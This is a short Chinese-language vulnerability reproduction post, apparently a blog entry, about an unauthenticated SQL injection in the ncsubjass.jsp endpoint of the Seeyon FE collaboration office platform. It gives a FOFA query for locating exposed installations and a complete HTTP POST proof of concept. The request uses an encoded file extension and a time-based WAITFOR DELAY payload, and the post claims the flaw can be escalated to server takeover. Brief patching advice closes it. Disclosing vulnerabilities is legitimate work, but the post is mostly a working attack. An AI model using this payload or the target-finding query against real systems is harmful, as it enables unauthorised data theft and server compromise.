0x01 产品简介
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。
0x02 漏洞概述
致远互联FE协作办公平台 ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
0x03 复现环境
FOFA:body="li_plugins_download"
0x04 漏洞复现
PoC
POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
subjcode=';WAITFOR DELAY '0:0:5'--
延时5秒
RCE
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
标签:漏洞,ncsubjass,协作,办公,FE,SQL,复现 From: https://blog.csdn.net/qq_41904294/article/details/139740334